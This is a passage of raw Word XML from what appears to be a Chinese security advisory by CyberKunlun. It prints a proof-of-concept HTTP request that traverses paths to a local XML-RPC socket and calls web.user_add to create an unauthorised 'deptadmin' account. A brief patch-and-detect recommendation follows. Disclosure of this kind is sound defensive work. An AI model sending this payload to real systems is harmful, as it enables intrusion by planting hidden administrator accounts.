        <w:tblW w:w="7938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938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938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POST /service/?unix:/../../../../var/run/rpc/xmlrpc.sock|http://test/wsrpc HTTP/1.1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Host: xxx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Cookie: LANG=zh; USM=0a0e1f29d69f4b9185430328b44ad990832935dbf1b90b8769d297dd9f0eb848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Cache-Control: max-age=0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Sec-Ch-Ua: " Not A;Brand";v="99", "Chromium";v="100", "Google Chrome";v="100" Sec-Ch-Ua-Mobile: ?0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Sec-Ch-Ua-Platform: "Windows" Upgrade-Insecure-Requests: 1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/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100.0.4896.127 Safari/537.36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Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0. 8,application/signed-exchange;v=b3;q=0.9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Sec-Fetch-Site: none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Sec-Fetch-Mode: navigate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Sec-Fetch-User: ?1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Sec-Fetch-Dest: document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Accept-Encoding: gzip, deflate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Accept-Language: zh-CN,zh;q=0.9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Connection: close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Content-Length: 1121 &lt;?xml version="1.0"?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methodCall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methodName&gt;web.user_add&lt;/methodNam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params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param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array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data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string&gt;admin&lt;/string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string&gt;5&lt;/string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string&gt;XX.XX.XX.XX&lt;/string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data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array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param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param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struct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name&gt;uname&lt;/nam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string&gt;deptadmin&lt;/string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name&gt;name&lt;/nam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string&gt;deptadmin&lt;/string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name&gt;pwd&lt;/nam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string&gt;Deptadmin@123&lt;/string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name&gt;authmode&lt;/nam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string&gt;1&lt;/string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name&gt;deptid&lt;/nam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string&gt;&lt;/string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name&gt;email&lt;/nam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string&gt;&lt;/string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name&gt;mobile&lt;/nam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string&gt;&lt;/string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name&gt;comment&lt;/nam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string&gt;&lt;/string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name&gt;roleid&lt;/nam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string&gt;101&lt;/string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member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struct&gt;&lt;/value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param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params&gt;</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left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/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t>&lt;/methodCall&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
        </w:rPr>
        <w:t>处置建议：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>升级版本或安装厂商官方补丁，用于提升系统自身安全性，同时，可通过安全设备快速感</w:t>
      </w:r>
      <w:bookmarkStart w:id="14" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
        <w:t>知漏洞利用行为并进行预警或阻断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p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>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:hAnsi="仿宋" w:cs="Arial"/>
          <w:color w:val="1F2329"/>
          <w:sz w:val="22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1111981360" o:spid="_x0000_s1026" o:spt="136" type="#_x0000_t136" style="position:absolute;left:0pt;height:130.1pt;width:455.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yberKL" style="font-family:仿宋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1111981359" o:spid="_x0000_s1025" o:spt="136" type="#_x0000_t136" style="position:absolute;left:0pt;height:130.1pt;width:455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yberKL" style="font-family:仿宋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73656"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="53D73656"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="11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2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1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16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0ODc3YjM4NjhjYTcwYTdhNGZkZDBlYzZmNDU2MTIifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00432D3C"/>
    <w:rsid w:val="000037C9"/>
    <w:rsid w:val="000129B4"/>
    <w:rsid w:val="0001600D"/>
    <w:rsid w:val="000244F0"/>
    <w:rsid w:val="00034EE1"/>
    <w:rsid w:val="00042C30"/>
    <w:rsid w:val="000448A2"/>
    <w:rsid w:val="00045C29"/>
    <w:rsid w:val="00057415"/>
    <w:rsid w:val="000606BC"/>
    <w:rsid w:val="00061BB0"/>
    <w:rsid w:val="000625D4"/>
    <w:rsid w:val="0006428F"/>
    <w:rsid w:val="00074ED4"/>
    <w:rsid w:val="000772EC"/>
    <w:rsid w:val="00080886"/>
    <w:rsid w:val="00080917"/>
    <w:rsid w:val="00083997"/>
    <w:rsid w:val="00087B72"/>
    <w:rsid w:val="000A4A87"/>
    <w:rsid w:val="000A58A9"/>
    <w:rsid w:val="000B289F"/>
    <w:rsid w:val="000B673F"/>
    <w:rsid w:val="000C01B1"/>
    <w:rsid w:val="000D24E4"/>
    <w:rsid w:val="000D4E85"/>
    <w:rsid w:val="000E501A"/>
    <w:rsid w:val="000F032E"/>
    <w:rsid w:val="000F35A0"/>
    <w:rsid w:val="000F48A0"/>
    <w:rsid w:val="000F651C"/>
    <w:rsid w:val="000F6EB1"/>
    <w:rsid w:val="000F74F4"/>
    <w:rsid w:val="001064FF"/>
    <w:rsid w:val="00107363"/>
    <w:rsid w:val="001117C8"/>
    <w:rsid w:val="0011660E"/>
    <w:rsid w:val="001226EE"/>
    <w:rsid w:val="00123BCC"/>
    <w:rsid w:val="00125EB2"/>
    <w:rsid w:val="0012790E"/>
    <w:rsid w:val="0014117C"/>
    <w:rsid w:val="001508F1"/>
    <w:rsid w:val="001638E6"/>
    <w:rsid w:val="00164818"/>
    <w:rsid w:val="00167D4B"/>
    <w:rsid w:val="001701A6"/>
    <w:rsid w:val="001714EA"/>
    <w:rsid w:val="00172C6C"/>
    <w:rsid w:val="00174D4E"/>
    <w:rsid w:val="00187D84"/>
    <w:rsid w:val="00192091"/>
    <w:rsid w:val="001A154A"/>
    <w:rsid w:val="001A2863"/>
    <w:rsid w:val="001A680A"/>
    <w:rsid w:val="001C295F"/>
    <w:rsid w:val="001C709F"/>
    <w:rsid w:val="001D2462"/>
    <w:rsid w:val="001E4768"/>
    <w:rsid w:val="001E79B7"/>
    <w:rsid w:val="00206512"/>
    <w:rsid w:val="002118D8"/>
    <w:rsid w:val="002124B0"/>
    <w:rsid w:val="00214D8C"/>
    <w:rsid w:val="00217FE6"/>
    <w:rsid w:val="00221472"/>
    <w:rsid w:val="00222269"/>
    <w:rsid w:val="00222FFC"/>
    <w:rsid w:val="00223176"/>
    <w:rsid w:val="0023538B"/>
    <w:rsid w:val="002400B7"/>
    <w:rsid w:val="00243BEC"/>
    <w:rsid w:val="00247BE5"/>
    <w:rsid w:val="0025127B"/>
    <w:rsid w:val="00251E37"/>
    <w:rsid w:val="002612B7"/>
    <w:rsid w:val="00276FCC"/>
    <w:rsid w:val="0027766C"/>
    <w:rsid w:val="00280A05"/>
    <w:rsid w:val="00290FF4"/>
    <w:rsid w:val="0029414B"/>
    <w:rsid w:val="002944F3"/>
    <w:rsid w:val="002A5B9E"/>
    <w:rsid w:val="002B102A"/>
    <w:rsid w:val="002B279B"/>
    <w:rsid w:val="002C186C"/>
    <w:rsid w:val="002C76A0"/>
    <w:rsid w:val="002D0F49"/>
    <w:rsid w:val="002D368C"/>
    <w:rsid w:val="002E6825"/>
    <w:rsid w:val="002F15B5"/>
    <w:rsid w:val="002F2AF1"/>
    <w:rsid w:val="002F4267"/>
    <w:rsid w:val="002F4C92"/>
    <w:rsid w:val="0030397E"/>
    <w:rsid w:val="00304850"/>
    <w:rsid w:val="003206C3"/>
    <w:rsid w:val="00342323"/>
    <w:rsid w:val="0036215E"/>
    <w:rsid w:val="00371FBE"/>
    <w:rsid w:val="00373B6B"/>
    <w:rsid w:val="003800F3"/>
    <w:rsid w:val="00392F49"/>
    <w:rsid w:val="00396239"/>
    <w:rsid w:val="00397F48"/>
    <w:rsid w:val="003C633F"/>
    <w:rsid w:val="003C709C"/>
    <w:rsid w:val="003D494B"/>
    <w:rsid w:val="003D49C9"/>
    <w:rsid w:val="003F0942"/>
    <w:rsid w:val="0040211C"/>
    <w:rsid w:val="00403749"/>
    <w:rsid w:val="004077B3"/>
    <w:rsid w:val="00410A42"/>
    <w:rsid w:val="00412072"/>
    <w:rsid w:val="004205F5"/>
    <w:rsid w:val="00422863"/>
    <w:rsid w:val="00425587"/>
    <w:rsid w:val="004321FF"/>
    <w:rsid w:val="004322E0"/>
    <w:rsid w:val="00432D3C"/>
    <w:rsid w:val="00432F04"/>
    <w:rsid w:val="00442C3C"/>
    <w:rsid w:val="004444B0"/>
    <w:rsid w:val="00447A59"/>
    <w:rsid w:val="00447D24"/>
    <w:rsid w:val="0045757F"/>
    <w:rsid w:val="00462614"/>
    <w:rsid w:val="00462C00"/>
    <w:rsid w:val="0048077B"/>
    <w:rsid w:val="00483229"/>
    <w:rsid w:val="00485ABF"/>
    <w:rsid w:val="00487033"/>
    <w:rsid w:val="00487EBE"/>
    <w:rsid w:val="00490FBE"/>
    <w:rsid w:val="00495519"/>
    <w:rsid w:val="00495CDC"/>
    <w:rsid w:val="004A6284"/>
    <w:rsid w:val="004B47B8"/>
    <w:rsid w:val="004B6B5D"/>
    <w:rsid w:val="004C487D"/>
    <w:rsid w:val="004C69D8"/>
    <w:rsid w:val="004D0F64"/>
    <w:rsid w:val="004D398B"/>
    <w:rsid w:val="004D6B2A"/>
    <w:rsid w:val="004D6EFA"/>
    <w:rsid w:val="004E1190"/>
    <w:rsid w:val="004E1788"/>
    <w:rsid w:val="004E4DD1"/>
    <w:rsid w:val="004F3881"/>
    <w:rsid w:val="00506F52"/>
    <w:rsid w:val="0051362F"/>
    <w:rsid w:val="00515410"/>
    <w:rsid w:val="005351F3"/>
    <w:rsid w:val="005472BE"/>
    <w:rsid w:val="005472CB"/>
    <w:rsid w:val="005542F0"/>
    <w:rsid w:val="005563DC"/>
    <w:rsid w:val="00576710"/>
    <w:rsid w:val="00583ABE"/>
    <w:rsid w:val="00584BE7"/>
    <w:rsid w:val="00585D5C"/>
    <w:rsid w:val="005A2473"/>
    <w:rsid w:val="005A2DC0"/>
    <w:rsid w:val="005A7405"/>
    <w:rsid w:val="005B4370"/>
    <w:rsid w:val="005B7761"/>
    <w:rsid w:val="005B785D"/>
    <w:rsid w:val="005C03D2"/>
    <w:rsid w:val="005C3B5C"/>
    <w:rsid w:val="005C7FD2"/>
    <w:rsid w:val="005D1F7E"/>
    <w:rsid w:val="005E0F42"/>
    <w:rsid w:val="005E0F5A"/>
    <w:rsid w:val="005E3A7F"/>
    <w:rsid w:val="005E78C8"/>
    <w:rsid w:val="00601415"/>
    <w:rsid w:val="006040A8"/>
    <w:rsid w:val="00605B05"/>
    <w:rsid w:val="00605D1E"/>
    <w:rsid w:val="00611220"/>
    <w:rsid w:val="006130E9"/>
    <w:rsid w:val="00616653"/>
    <w:rsid w:val="00625E47"/>
    <w:rsid w:val="006265BE"/>
    <w:rsid w:val="00634B92"/>
    <w:rsid w:val="0063723F"/>
    <w:rsid w:val="00642C2A"/>
    <w:rsid w:val="0064317C"/>
    <w:rsid w:val="00643A22"/>
    <w:rsid w:val="00662487"/>
    <w:rsid w:val="00664F68"/>
    <w:rsid w:val="00674E70"/>
    <w:rsid w:val="006804F3"/>
    <w:rsid w:val="00681873"/>
    <w:rsid w:val="00681CD7"/>
    <w:rsid w:val="006824A7"/>
    <w:rsid w:val="00686538"/>
    <w:rsid w:val="006869D3"/>
    <w:rsid w:val="00697955"/>
    <w:rsid w:val="006A04B6"/>
    <w:rsid w:val="006A1214"/>
    <w:rsid w:val="006B350D"/>
    <w:rsid w:val="006C0111"/>
    <w:rsid w:val="006D4268"/>
    <w:rsid w:val="006F0660"/>
    <w:rsid w:val="00703618"/>
    <w:rsid w:val="00703932"/>
    <w:rsid w:val="00714340"/>
    <w:rsid w:val="0072694B"/>
    <w:rsid w:val="00730286"/>
    <w:rsid w:val="00733D0F"/>
    <w:rsid w:val="00737A10"/>
    <w:rsid w:val="007470F7"/>
    <w:rsid w:val="007517A4"/>
    <w:rsid w:val="007521D2"/>
    <w:rsid w:val="00755B46"/>
    <w:rsid w:val="0076655B"/>
    <w:rsid w:val="007746FA"/>
    <w:rsid w:val="0078794C"/>
    <w:rsid w:val="0079105B"/>
    <w:rsid w:val="007969B9"/>
    <w:rsid w:val="007A3F86"/>
    <w:rsid w:val="007A5696"/>
    <w:rsid w:val="007A5DC2"/>
    <w:rsid w:val="007A7C51"/>
    <w:rsid w:val="007B30B6"/>
    <w:rsid w:val="007B59FD"/>
    <w:rsid w:val="007B5CE2"/>
    <w:rsid w:val="007B70C8"/>
    <w:rsid w:val="007C1C37"/>
    <w:rsid w:val="007C42FA"/>
    <w:rsid w:val="007C46E9"/>
    <w:rsid w:val="007C7BE9"/>
    <w:rsid w:val="007D09C6"/>
    <w:rsid w:val="007D628E"/>
    <w:rsid w:val="007D62E0"/>
    <w:rsid w:val="007E0024"/>
    <w:rsid w:val="007E01EF"/>
    <w:rsid w:val="007E1B9A"/>
    <w:rsid w:val="007F0DAE"/>
    <w:rsid w:val="007F7728"/>
    <w:rsid w:val="00801767"/>
    <w:rsid w:val="008052A0"/>
    <w:rsid w:val="008061ED"/>
    <w:rsid w:val="00811ABA"/>
    <w:rsid w:val="00816771"/>
    <w:rsid w:val="00816F29"/>
    <w:rsid w:val="0081765F"/>
    <w:rsid w:val="0083022F"/>
    <w:rsid w:val="00832AD1"/>
    <w:rsid w:val="00833377"/>
    <w:rsid w:val="0083417C"/>
    <w:rsid w:val="008352C5"/>
    <w:rsid w:val="00854F8B"/>
    <w:rsid w:val="00862EAD"/>
    <w:rsid w:val="00863271"/>
    <w:rsid w:val="00865753"/>
    <w:rsid w:val="00875820"/>
    <w:rsid w:val="00877C77"/>
    <w:rsid w:val="00885AB8"/>
    <w:rsid w:val="00886731"/>
    <w:rsid w:val="00891E46"/>
    <w:rsid w:val="008A1638"/>
    <w:rsid w:val="008A65FB"/>
    <w:rsid w:val="008A7CEA"/>
    <w:rsid w:val="008A7E1E"/>
    <w:rsid w:val="008D17B2"/>
    <w:rsid w:val="008D408B"/>
    <w:rsid w:val="008D7478"/>
    <w:rsid w:val="008E3966"/>
    <w:rsid w:val="008E3ADC"/>
    <w:rsid w:val="008E3D6B"/>
    <w:rsid w:val="008E4541"/>
    <w:rsid w:val="008F3BE2"/>
    <w:rsid w:val="00900FD0"/>
    <w:rsid w:val="00904A1E"/>
    <w:rsid w:val="00910D15"/>
    <w:rsid w:val="00913BC6"/>
    <w:rsid w:val="009151F4"/>
    <w:rsid w:val="00921419"/>
    <w:rsid w:val="00923E92"/>
    <w:rsid w:val="009338F4"/>
    <w:rsid w:val="009341C8"/>
    <w:rsid w:val="00936FBE"/>
    <w:rsid w:val="00950AED"/>
    <w:rsid w:val="00956BB2"/>
    <w:rsid w:val="00964A02"/>
    <w:rsid w:val="00974D34"/>
    <w:rsid w:val="00976D0C"/>
    <w:rsid w:val="00981950"/>
    <w:rsid w:val="00982CD5"/>
    <w:rsid w:val="00986D7C"/>
    <w:rsid w:val="00990D77"/>
    <w:rsid w:val="00997B73"/>
    <w:rsid w:val="009A3045"/>
    <w:rsid w:val="009A7DCD"/>
    <w:rsid w:val="009B1DF8"/>
    <w:rsid w:val="009B372E"/>
    <w:rsid w:val="009C143E"/>
    <w:rsid w:val="009C6F7C"/>
    <w:rsid w:val="009E0BFD"/>
    <w:rsid w:val="009E213B"/>
    <w:rsid w:val="009E26FA"/>
    <w:rsid w:val="009F3AF3"/>
    <w:rsid w:val="00A0059E"/>
    <w:rsid w:val="00A01A7B"/>
    <w:rsid w:val="00A07BD0"/>
    <w:rsid w:val="00A07F03"/>
    <w:rsid w:val="00A105F4"/>
    <w:rsid w:val="00A11D62"/>
    <w:rsid w:val="00A12DC2"/>
    <w:rsid w:val="00A13D54"/>
    <w:rsid w:val="00A22F11"/>
    <w:rsid w:val="00A24865"/>
    <w:rsid w:val="00A32D1E"/>
    <w:rsid w:val="00A3572D"/>
    <w:rsid w:val="00A647E1"/>
    <w:rsid w:val="00A9044E"/>
    <w:rsid w:val="00A914F3"/>
    <w:rsid w:val="00A9202E"/>
    <w:rsid w:val="00A923AE"/>
    <w:rsid w:val="00A94FE1"/>
    <w:rsid w:val="00A9630A"/>
    <w:rsid w:val="00AA3962"/>
    <w:rsid w:val="00AA61D2"/>
    <w:rsid w:val="00AA7753"/>
    <w:rsid w:val="00AB2B25"/>
    <w:rsid w:val="00AC2452"/>
    <w:rsid w:val="00AD0ED3"/>
    <w:rsid w:val="00AD4977"/>
    <w:rsid w:val="00AD56A5"/>
    <w:rsid w:val="00AD5D3C"/>
    <w:rsid w:val="00AE5912"/>
    <w:rsid w:val="00AE6F3D"/>
    <w:rsid w:val="00AF7336"/>
    <w:rsid w:val="00B008B0"/>
    <w:rsid w:val="00B01737"/>
    <w:rsid w:val="00B021B7"/>
    <w:rsid w:val="00B0342E"/>
    <w:rsid w:val="00B03539"/>
    <w:rsid w:val="00B061AB"/>
    <w:rsid w:val="00B1224E"/>
    <w:rsid w:val="00B1431B"/>
    <w:rsid w:val="00B25D28"/>
    <w:rsid w:val="00B301F3"/>
    <w:rsid w:val="00B31181"/>
    <w:rsid w:val="00B31946"/>
    <w:rsid w:val="00B367CF"/>
    <w:rsid w:val="00B374AD"/>
    <w:rsid w:val="00B40616"/>
    <w:rsid w:val="00B435EA"/>
    <w:rsid w:val="00B4628C"/>
    <w:rsid w:val="00B54B86"/>
    <w:rsid w:val="00B5615B"/>
    <w:rsid w:val="00B610F1"/>
    <w:rsid w:val="00B63E61"/>
    <w:rsid w:val="00B737D7"/>
    <w:rsid w:val="00B907F6"/>
    <w:rsid w:val="00B92EC2"/>
    <w:rsid w:val="00B93E99"/>
    <w:rsid w:val="00B96DD8"/>
    <w:rsid w:val="00B97F7E"/>
    <w:rsid w:val="00BA2F55"/>
    <w:rsid w:val="00BA319F"/>
    <w:rsid w:val="00BA579A"/>
    <w:rsid w:val="00BA72CD"/>
    <w:rsid w:val="00BB70D3"/>
    <w:rsid w:val="00BC21A0"/>
    <w:rsid w:val="00BC5A7C"/>
    <w:rsid w:val="00BC6D2D"/>
    <w:rsid w:val="00BE17F3"/>
    <w:rsid w:val="00BE3C3A"/>
    <w:rsid w:val="00BE6F36"/>
    <w:rsid w:val="00BF3C12"/>
    <w:rsid w:val="00C02AE3"/>
    <w:rsid w:val="00C02FCE"/>
    <w:rsid w:val="00C05AC7"/>
    <w:rsid w:val="00C05D9D"/>
    <w:rsid w:val="00C10BDF"/>
    <w:rsid w:val="00C13616"/>
    <w:rsid w:val="00C23E4A"/>
    <w:rsid w:val="00C301BD"/>
    <w:rsid w:val="00C3664C"/>
    <w:rsid w:val="00C43B0E"/>
    <w:rsid w:val="00C46A7F"/>
    <w:rsid w:val="00C50943"/>
    <w:rsid w:val="00C52642"/>
    <w:rsid w:val="00C5286D"/>
    <w:rsid w:val="00C56BBF"/>
    <w:rsid w:val="00C713A2"/>
    <w:rsid w:val="00C74FEF"/>
    <w:rsid w:val="00C8478A"/>
    <w:rsid w:val="00C86B20"/>
    <w:rsid w:val="00C87CCA"/>
    <w:rsid w:val="00C87F2A"/>
    <w:rsid w:val="00C97070"/>
    <w:rsid w:val="00C9727F"/>
    <w:rsid w:val="00CA1688"/>
    <w:rsid w:val="00CA3F26"/>
    <w:rsid w:val="00CB424E"/>
    <w:rsid w:val="00CC07F2"/>
    <w:rsid w:val="00CC251A"/>
    <w:rsid w:val="00CC4F92"/>
    <w:rsid w:val="00CC52FA"/>
    <w:rsid w:val="00CC5790"/>
    <w:rsid w:val="00CD5293"/>
    <w:rsid w:val="00CD543D"/>
    <w:rsid w:val="00CF161D"/>
    <w:rsid w:val="00D06BE3"/>
    <w:rsid w:val="00D14FC7"/>
    <w:rsid w:val="00D2154C"/>
    <w:rsid w:val="00D3392E"/>
    <w:rsid w:val="00D3489A"/>
    <w:rsid w:val="00D34CE9"/>
    <w:rsid w:val="00D357CF"/>
    <w:rsid w:val="00D40156"/>
    <w:rsid w:val="00D40AE6"/>
    <w:rsid w:val="00D41116"/>
    <w:rsid w:val="00D4716A"/>
    <w:rsid w:val="00D503B0"/>
    <w:rsid w:val="00D678AA"/>
    <w:rsid w:val="00D7297E"/>
    <w:rsid w:val="00D73C09"/>
    <w:rsid w:val="00D74438"/>
    <w:rsid w:val="00D76016"/>
    <w:rsid w:val="00D84448"/>
    <w:rsid w:val="00D864B5"/>
    <w:rsid w:val="00D8791E"/>
    <w:rsid w:val="00D92F6E"/>
    <w:rsid w:val="00D930AC"/>
    <w:rsid w:val="00D96977"/>
    <w:rsid w:val="00DB43A3"/>
    <w:rsid w:val="00DB7E34"/>
    <w:rsid w:val="00DC5C97"/>
    <w:rsid w:val="00DC6078"/>
    <w:rsid w:val="00DC66C8"/>
    <w:rsid w:val="00DD4E3D"/>
    <w:rsid w:val="00DD5D59"/>
    <w:rsid w:val="00DE30F8"/>
    <w:rsid w:val="00DE6CB2"/>
    <w:rsid w:val="00DF008E"/>
    <w:rsid w:val="00DF12BC"/>
    <w:rsid w:val="00DF1690"/>
    <w:rsid w:val="00E01525"/>
    <w:rsid w:val="00E04552"/>
    <w:rsid w:val="00E10377"/>
    <w:rsid w:val="00E12F47"/>
    <w:rsid w:val="00E13921"/>
    <w:rsid w:val="00E173C1"/>
    <w:rsid w:val="00E21E02"/>
    <w:rsid w:val="00E2268A"/>
    <w:rsid w:val="00E22CAB"/>
    <w:rsid w:val="00E34923"/>
    <w:rsid w:val="00E35D29"/>
    <w:rsid w:val="00E361B5"/>
    <w:rsid w:val="00E46565"/>
    <w:rsid w:val="00E543F5"/>
    <w:rsid w:val="00E54D61"/>
    <w:rsid w:val="00E55745"/>
    <w:rsid w:val="00E67937"/>
    <w:rsid w:val="00E708C7"/>
    <w:rsid w:val="00E74B36"/>
    <w:rsid w:val="00E83B33"/>
    <w:rsid w:val="00E844D4"/>
    <w:rsid w:val="00E947D0"/>
    <w:rsid w:val="00EB00C2"/>
    <w:rsid w:val="00EB02C5"/>
    <w:rsid w:val="00EB1927"/>
    <w:rsid w:val="00EB66BC"/>
    <w:rsid w:val="00EC6655"/>
    <w:rsid w:val="00ED09BA"/>
    <w:rsid w:val="00ED2229"/>
    <w:rsid w:val="00ED48D7"/>
    <w:rsid w:val="00F078C5"/>
    <w:rsid w:val="00F12516"/>
    <w:rsid w:val="00F16555"/>
    <w:rsid w:val="00F17183"/>
    <w:rsid w:val="00F27F19"/>
    <w:rsid w:val="00F36F31"/>
    <w:rsid w:val="00F37423"/>
    <w:rsid w:val="00F471D8"/>
    <w:rsid w:val="00F524EE"/>
    <w:rsid w:val="00F61A40"/>
    <w:rsid w:val="00F62652"/>
    <w:rsid w:val="00F66F66"/>
    <w:rsid w:val="00F671DA"/>
    <w:rsid w:val="00F76276"/>
    <w:rsid w:val="00F7695E"/>
    <w:rsid w:val="00F844B4"/>
    <w:rsid w:val="00F85B8A"/>
    <w:rsid w:val="00F910DB"/>
    <w:rsid w:val="00F93182"/>
    <w:rsid w:val="00F96D67"/>
    <w:rsid w:val="00F96F44"/>
    <w:rsid w:val="00F97940"/>
    <w:rsid w:val="00FB0734"/>
    <w:rsid w:val="00FB7042"/>
    <w:rsid w:val="00FC6EE6"/>
    <w:rsid w:val="00FD15C3"/>
    <w:rsid w:val="00FD3A3F"/>
    <w:rsid w:val="00FE1C92"/>
    <w:rsid w:val="00FE3B0A"/>
    <w:rsid w:val="00FF17EC"/>
    <w:rsid w:val="00FF37F3"/>
    <w:rsid w:val="210055BF"/>
    <w:rsid w:val="41122EA0"/>
    <w:rsid w:val="52780350"/>
    <w:rsid w:val="6EE821B5"/>
    <w:rsid w:val="7D7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仿宋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uiPriority w:val="39"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="420"/>
        <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
      </w:tabs>
      <w:jc w:val="center"/>
    </w:pPr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6">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="2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Style 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="13"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="12">
    <w:name w:val="Style 2"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="15"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="1"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="Style 1 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="11"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="14">
    <w:name w:val="Style 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="17"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="2"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="15">
    <w:name w:val="Style 2 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="12"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="16">
    <w:name w:val="Style 4"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="18"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="3"/>
        <w:numId w:val="1"/>
      </w:numPr>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="Style 3 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="14"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:b/>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="Style 4 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="16"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:b/>
      <w:sz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HTML 预设格式 字符"/>
    <w:basedOn w:val="9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页眉 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:eastAsia="仿宋"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="22">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="9"/>
    <w:link w:val="2"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ADB83-E837-4127-90EE-50D19E40F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eijing CyberKunlun Technology</Company>
  <Pages>45</Pages>
  <Words>3322</Words>
  <Characters>18941</Characters>
  <Lines>157</Lines>
  <Paragraphs>44</Paragraphs>
  <TotalTime>133</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2221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5:19:00Z</dcterms:created>
  <dc:creator>张须峥</dc:creator>
  <cp:lastModifiedBy>ycn</cp:lastModifiedBy>
  <cp:lastPrinted>2023-08-10T06:31:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-08-11T13:42:22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79CD6A1795AB41E795C351215E5085F8_12</vt:lpwstr>
  </property>
</Properties>
</file>